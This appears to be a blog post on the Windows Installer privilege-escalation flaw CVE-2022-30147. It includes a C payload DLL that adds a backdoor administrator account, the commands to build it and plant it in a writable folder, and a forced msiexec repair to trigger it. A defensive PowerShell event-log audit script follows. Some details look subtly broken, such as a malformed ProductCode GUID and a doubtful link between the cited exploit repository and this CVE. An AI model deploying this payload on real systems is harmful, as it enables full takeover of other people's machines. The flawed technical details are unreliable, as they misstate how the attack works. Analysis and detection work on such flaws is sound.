Windows is the backbone of personal and corporate computing. But just like any big system, it has its share of vulnerabilities. One such flaw found in 2022 is CVE-2022-30147. This post dives into what this vulnerability is, how it can be exploited, and the significance of the issue. We’ll also provide code snippets, highlight how the exploit works, and share trusted references.
What Is CVE-2022-30147?
CVE-2022-30147 is a privilege escalation bug in the Windows Installer component. If exploited successfully, it allows attackers with limited access to increase their privileges—potentially taking full control of a vulnerable computer. Microsoft categorized it as an Elevation of Privilege (EoP) vulnerability with a CVSS score of 7.8 (High).
Official Microsoft advisory:
- Microsoft Security Response CVE-2022-30147
How Does It Work? (Technical Overview)
The root cause lies in improper access controls within the Windows Installer service (msiexec.exe). A low-privileged attacker can leverage this service to execute code as SYSTEM (the most privileged account on Windows).
The bug can be exploited if an attacker manages to place or modify files in specific Windows directories associated with installing software packages. When a privileged operation occurs—like “repairing” or “updating” installed software—malicious code can be injected and run with elevated privileges.
Important: An attacker must have local access to the target system. This is not remotely exploitable.
Proof-of-Concept (PoC) Exploit
Security researcher Abdelhamid Naceri published a PoC for this bug. Here’s a simplified version for demonstration purposes, built from a small C DLL and a few PowerShell commands.
Disclaimer:
This code is for educational purposes only. Don’t use it on machines you don’t own or without permission.
2. Code Snippet: Simplified PoC
Let's focus on exploiting the way Windows Installer repairs an application and loads DLLs.
Step A: Create a Malicious DLL (Replace with your payload.)
```c
// Save as evil.c
#include <windows.h>
#include <stdlib.h>   // system()

// Payload DLL from the post: whatever process loads it runs the code below
// under its own account. The reason check keeps the payload from re-running
// on every thread attach/detach notification.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    (void)hModule;
    (void)lpReserved;
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("net user attacker P@ssword123 /add");
        system("net localgroup administrators attacker /add");
    }
    return TRUE;
}
```
Compile this from a Visual Studio developer command prompt, building for the same architecture as the target’s msiexec.exe (normally x64):

```bat
cl evil.c /LD /Fe:evil.dll
```
Step B: Place the DLL in the writable folder

```powershell
Copy-Item .\evil.dll "C:\Users\Public\evil.dll"
```

Find the ProductCode of an installed MSI (the example shows “7-Zip”). Be aware that querying Win32_Product makes WMI run a consistency check on every installed product, which is slow and can itself trigger repairs; reading the per-product entries under the Uninstall registry key is the lighter-weight alternative.

```powershell
Get-WmiObject -Class Win32_Product | Select-Object Name,IdentifyingNumber
```

Suppose 7-Zip gives {23170F69-40C1-2702-092-000001000000}.

Now trigger a repair of that product (the `/fa` switch forces every file to be reinstalled), which makes the Installer service pick up the poisoned path:

```powershell
msiexec /fa {23170F69-40C1-2702-092-000001000000}
```
> *Note: Advanced exploits use directory junctions or hard links to redirect the system to load the attacker's DLL.*
3. What Happens Next?
During the MSI repair above, Windows Installer (running as SYSTEM) sees the "evil.dll" in the path and loads it, executing whatever code is inside with SYSTEM privileges. In our example, it adds a new user and places that user in the Administrators group.
- Local escalation from a regular user to SYSTEM.
- Attackers could fully compromise affected systems by gaining admin rights, stealing data, disabling security controls, and more.
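The activity described above leaves a trail in the Application event log, because the Installer service records every transaction it begins and every product it reconfigures. The following PowerShell script is an added example for defenders (it is not part of the original post or of the PoC repository): it pulls recent MsiInstaller events, resolves which account initiated each one, and flags transactions whose source sits under a user-writable directory such as C:\Users\Public. It assumes the standard MsiInstaller event IDs 1040 (transaction begins, message carries the MSI path or ProductCode and the client PID) and 1035 (product reconfigured), and the `$SuspiciousRoots` list is a starting point to adjust for your environment.

```powershell
# Added defender example, not from the original post or the PoC repository.
# Audits recent Windows Installer transactions and repairs, and flags any whose
# source is under a user-writable location. Run from an elevated session.
# Assumptions: MsiInstaller event 1040 = "Beginning a Windows Installer transaction:
# <path or ProductCode>. Client Process Id: N.", event 1035 = "Windows Installer
# reconfigured the product. Product Name: ... Reconfiguration success or error status: 0."
param(
    [int]$LookbackHours = 24,
    [string[]]$SuspiciousRoots = @(
        "$env:SystemDrive\Users\Public",
        "$env:SystemDrive\Windows\Temp",
        "$env:SystemDrive\ProgramData"
    )
)

$since = (Get-Date).AddHours(-$LookbackHours)

# Transaction-start (1040) and reconfigure/repair (1035) events from the Installer provider.
$events = Get-WinEvent -FilterHashtable @{
    LogName      = 'Application'
    ProviderName = 'MsiInstaller'
    Id           = 1040, 1035
    StartTime    = $since
} -ErrorAction SilentlyContinue

if (-not $events) {
    Write-Host "No MsiInstaller transaction/repair events in the last $LookbackHours hours."
    return
}

# Resolve the SID stamped on the event to an account name, so a standard user
# kicking off repairs stands out next to SYSTEM or an admin account.
function Resolve-Sid($Sid) {
    if (-not $Sid) { return 'n/a' }
    try { $Sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $Sid.Value }
}

$report = foreach ($e in $events) {
    $msg = $e.Message
    # 1040 messages carry the MSI path (or ProductCode) and the client process id.
    $source    = if ($msg -match 'transaction:\s*(.+?)\.\s*Client Process Id') { $Matches[1] } else { $null }
    $clientPid = if ($msg -match 'Client Process Id:\s*(\d+)') { [int]$Matches[1] } else { $null }
    # 1035 messages carry the product name that was reconfigured (repaired).
    $product   = if ($msg -match 'Product Name:\s*(.+?)\.\s*Product Version') { $Matches[1] } else { $null }

    # A transaction whose source lives in a world-writable directory matches the
    # file-planting pattern this vulnerability class abuses.
    $fromWritable = $false
    if ($source) {
        foreach ($root in $SuspiciousRoots) {
            if ($source.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                $fromWritable = $true
            }
        }
    }

    [pscustomobject]@{
        Time         = $e.TimeCreated
        EventId      = $e.Id
        User         = Resolve-Sid $e.UserId
        Product      = $product
        Source       = $source
        ClientPid    = $clientPid
        FromWritable = $fromWritable
    }
}

$report | Sort-Object Time | Format-Table -AutoSize

$flagged = @($report | Where-Object FromWritable)
if ($flagged.Count -gt 0) {
    Write-Warning "$($flagged.Count) Installer transaction(s) started from a user-writable path; review the initiating user and client process."
}
```

The client PID reported by event 1040 is the process that asked the service to start the transaction, so pairing it with process-creation auditing (Security event 4688 or Sysmon event 1) tells you which user launched msiexec and with what command line. Repairs of products the user did not install, or repairs immediately preceded by a new DLL appearing under one of the listed roots, are the combinations worth escalating.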
Microsoft patched this bug in June 2022. Make sure your Windows systems are fully updated:
Patch Tuesday - June 2022, CVE-2022-30147
Microsoft CVE-2022-30147 Advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30147
The original exploit by Abdelhamid Naceri:
https://github.com/klinix5/InstallerFileTakeOver
Security Analysis:
Conclusion
*CVE-2022-30147* is another example of how complex Windows components like Installer are prime targets for attackers seeking elevation of privilege. If you haven’t already, install the official security updates to stay safe, and regularly audit local user activities that involve MSI installation or repair operations.
For researchers, this bug shows how “old” software plumbing can be leveraged for powerful attacks. For admins, it’s a reminder to keep patching a top priority.
Timeline
Published on: 06/15/2022 22:15:00 UTC
Last modified on: 06/27/2022 16:49:00 UTC